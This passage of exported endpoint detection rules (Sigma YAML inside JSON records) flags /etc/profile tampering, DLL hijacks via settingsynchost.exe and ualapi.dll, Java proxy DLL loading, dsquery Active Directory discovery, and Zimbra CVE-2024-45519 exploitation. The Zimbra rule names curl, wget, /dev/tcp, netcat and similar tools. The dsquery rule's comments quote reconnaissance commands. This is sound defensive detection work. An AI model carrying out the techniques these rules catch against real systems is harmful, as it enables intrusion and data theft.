ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf update'\n - 'dnf upgrade'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_reconfigure:\n - ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n - ProcessParentCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_plesk:\n ProcessCommandLine|startswith:\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install '\n - '/usr/libexec/platform-python -Estt /usr/local/psa/bin/dnf_install '\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_podman:\n - ProcessImage: '/usr/bin/podman'\n - ProcessAncestors|contains: '|/usr/bin/conmon|/usr/bin/podman|'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_packagekit:\n ProcessImage:\n - '/usr/libexec/packagekitd'\n - '/usr/lib/packagekit/packagekitd'\n\n exclusion_crio:\n ProcessImage: '/usr/bin/crio'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_puppet:\n ProcessImage|startswith: '/opt/puppetlabs/'\n\n exclusion_buildah:\n ProcessCommandLine: 'storage-untar / */containers/storage/overlay/*'\n\n exclusion_convert2rhel:\n ProcessParentCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9f55b9d-87ee-4d92-ba79-5004d14af637",
"rule_name": "System Profile Modified",
"rule_description": "Detects an attempt to modify the system profile script (/etc/profile) and scripts in the /etc/profile.d/ directory.\nThese scripts contain Linux system-wide environment and startup programs.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to these files.\nIt is recommended to investigate the process that read the file for suspicious activities.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "da7ccf86-060f-4fa0-a574-3dd02a4dc0de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098920Z",
"creation_date": "2026-03-23T11:45:34.098922Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098926Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_settingsynchost.yml",
"content": "title: DLL Hijacking via settingsynchost.exe\nid: da7ccf86-060f-4fa0-a574-3dd02a4dc0de\ndescription: |\n Detects potential Windows DLL Hijacking via settingsynchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'settingsynchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\umpdc.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "da7ccf86-060f-4fa0-a574-3dd02a4dc0de",
"rule_name": "DLL Hijacking via settingsynchost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via settingsynchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "da9eaad8-ad16-4f59-9475-9fab6a794647",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082397Z",
"creation_date": "2026-03-23T11:45:34.082399Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082403Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://windows-internals.com/faxing-your-way-to-system/",
"https://github.com/ionescu007/faxhell",
"https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_prepare_persistence_dll_hijack_ualapi.yml",
"content": "title: Fax/Print Spooler Service DLL Hijack Prepared\nid: da9eaad8-ad16-4f59-9475-9fab6a794647\ndescription: |\n Detects preparation of a DLL hijack of the Fax and the Windows Print Spooler service trying to load the non-existant ualapi.dll DLL from system32 directory.\n The ualapi.dll library is loaded by the Fax and the Spooler Windows service when started and is not present on system by default.\n It is recommended to investigate the loaded DLL, and to look for alerts detecting a spooler hijacking being executed.\nreferences:\n - https://windows-internals.com/faxing-your-way-to-system/\n - https://github.com/ionescu007/faxhell\n - https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2023/09/22\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_create:\n Kind: 'create'\n Path: '?:\\Windows\\System32\\ualapi.dll'\n\n selection_rename:\n Kind: 'rename'\n TargetPath: '?:\\Windows\\System32\\ualapi.dll'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "da9eaad8-ad16-4f59-9475-9fab6a794647",
"rule_name": "Fax/Print Spooler Service DLL Hijack Prepared",
"rule_description": "Detects preparation of a DLL hijack of the Fax and the Windows Print Spooler service trying to load the non-existant ualapi.dll DLL from system32 directory.\nThe ualapi.dll library is loaded by the Fax and the Spooler Windows service when started and is not present on system by default.\nIt is recommended to investigate the loaded DLL, and to look for alerts detecting a spooler hijacking being executed.\n",
"rule_creation_date": "2023-09-22",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dab93a0e-9b6b-4fde-9c39-ed8b5581c37f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080898Z",
"creation_date": "2026-03-23T11:45:34.080900Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080905Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2017/09/27/beyond-good-ol-run-key-part-65/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_java_proxy_execution.yml",
"content": "title: Proxy DLL Execution via Java\nid: dab93a0e-9b6b-4fde-9c39-ed8b5581c37f\ndescription: |\n Detects execution of 'Java.exe' with suspicious command-line arguments indicating DLL execution.\n This binary, which is digitally signed by Oracle, can be used to load malicious DLLs.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to investigate the DLL loaded and the parent proces for suspicious activities.\nreferences:\n - https://www.hexacorn.com/blog/2017/09/27/beyond-good-ol-run-key-part-65/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - OriginalFileName: 'java.exe'\n - Image|endswith: '\\java.exe'\n\n selection_arg:\n CommandLine|endswith:\n - ' -agentlib:*.dll'\n - ' -agentpath:*.dll'\n\n filter_long_commandline:\n CommandLine|endswith:\n - ' -agentlib:* *.dll'\n - ' -agentpath:* *.dll'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dab93a0e-9b6b-4fde-9c39-ed8b5581c37f",
"rule_name": "Proxy DLL Execution via Java",
"rule_description": "Detects execution of 'Java.exe' with suspicious command-line arguments indicating DLL execution.\nThis binary, which is digitally signed by Oracle, can be used to load malicious DLLs.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to investigate the DLL loaded and the parent proces for suspicious activities.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dacb9ce2-0179-4503-b58d-3143cfc42261",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605128Z",
"creation_date": "2026-03-23T11:45:34.605131Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605139Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732952(v=ws.11)?redirectedfrom=MSDN",
"https://www.mandiant.com/resources/blog/apt41-us-state-governments",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/software/S0105/"
],
"name": "t1087_002_dsquery.yml",
"content": "title: Active Directory Discovered via dsquery.exe\nid: dacb9ce2-0179-4503-b58d-3143cfc42261\ndescription: |\n Detects the execution of the Dsquery tool, which is a command-line tool that may be present on some Windows Server.\n Dsquery is a legitimate Windows binary that can be used to query an Active Directory to gather information.\n This tool is often used by attackers during the discovery phase.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc732952(v=ws.11)?redirectedfrom=MSDN\n - https://www.mandiant.com/resources/blog/apt41-us-state-governments\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/software/S0105/\ndate: 2022/08/26\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.002\n - attack.s0105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Dsquery\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_dsquery:\n OriginalFileName: 'dsquery.exe'\n\n selection_filter:\n CommandLine|contains:\n - ' -filter '\n - ' /filter '\n - ' -attr '\n - ' /attr '\n\n selection_filter_trust:\n # dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n CommandLine|contains|all:\n - 'objectClass'\n - 'trustedDomain'\n\n selection_filter_person:\n # dsquery.exe * -filter \"(objectCategory=Person)\" -attr cn title displayName description\n CommandLine|contains|all:\n - 'objectCategory'\n - 'Person'\n\n selection_filter_computer:\n # dsquery.exe * -filter \"(objectCategory=Computer)\" -attr cn operatingSystem operatingSystemServicePack operatingSystemVersion\n CommandLine|contains|all:\n - 'objectCategory'\n - 'Computer'\n\n selection_filter_group:\n # dsquery.exe * -filter \"(objectCategory=Group)\" -uc -attr cn sAMAccountName distinguishedName description -limit 0\n CommandLine|contains|all:\n - 'objectCategory'\n - 'Group'\n\n selection_filter_unit:\n # dsquery.exe * -filter \"(objectClass=organizationalUnit)\" -attr ou name whenCreated distinguishedName gPLink -limit 0\n CommandLine|contains|all:\n - 'objectClass'\n - 'organizationalUnit'\n\n selection_subnet:\n # dsquery subnet -limit 0\n CommandLine|contains: ' subnet '\n\n condition: selection_dsquery and ((selection_filter and 1 of selection_filter_*) or selection_subnet)\nfalsepositives:\n - Legitimate administrator action\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dacb9ce2-0179-4503-b58d-3143cfc42261",
"rule_name": "Active Directory Discovered via dsquery.exe",
"rule_description": "Detects the execution of the Dsquery tool, which is a command-line tool that may be present on some Windows Server.\nDsquery is a legitimate Windows binary that can be used to query an Active Directory to gather information.\nThis tool is often used by attackers during the discovery phase.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-08-26",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db057758-949f-44f5-9814-aef16e94ef02",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613147Z",
"creation_date": "2026-03-23T11:45:34.613151Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613158Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.projectdiscovery.io/zimbra-remote-code-execution/",
"https://blog.zimbra.com/2024/10/zimbra-cve-2024-45519-vulnerability-stay-secure-by-updating/",
"https://github.com/Chocapikk/CVE-2024-45519",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "cve_2024_45519_zimbra_rce.yml",
"content": "title: Zimbra CVE-2024-45519 RCE Exploited\nid: db057758-949f-44f5-9814-aef16e94ef02\ndescription: |\n Detects the suspicious creation of child processes by the postjournal service related to the exploitation of a Zimbra vulnerability.\n This behavior is related to the exploitation of the \"exchange compatible journaling\" feature on non-patched Zimbra instances.\n This flaw allows remote unauthenticated attackers to execute arbitrary commands.\n It is recommended to gather more information about the Zimbra instance and to investigate the command-line.\nreferences:\n - https://blog.projectdiscovery.io/zimbra-remote-code-execution/\n - https://blog.zimbra.com/2024/10/zimbra-cve-2024-45519-vulnerability-stay-secure-by-updating/\n - https://github.com/Chocapikk/CVE-2024-45519\n - https://attack.mitre.org/techniques/T1190/\ndate: 2024/10/09\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - cve.2024-45519\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.Zimbra\n - classification.Linux.Exploit.CVE-2024-45519\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.InitialAccess\nlogsource:\n product: linux\n category: process_creation\n\ndetection:\n selection_process:\n ProcessParentImage|endswith: '/postjournal'\n CommandLine|startswith:\n - 'sh -c postalias -q '\n - 'sh -c postmap -q '\n\n selection_command:\n CommandLine|contains:\n - '${IFS}'\n - 'curl'\n - 'wget'\n - '/dev/tcp'\n - '/dev/udp'\n - 'base64'\n - 'openssl'\n - 'perl'\n - 'netcat'\n - ' nc '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db057758-949f-44f5-9814-aef16e94ef02",
"rule_name": "Zimbra CVE-2024-45519 RCE Exploited",
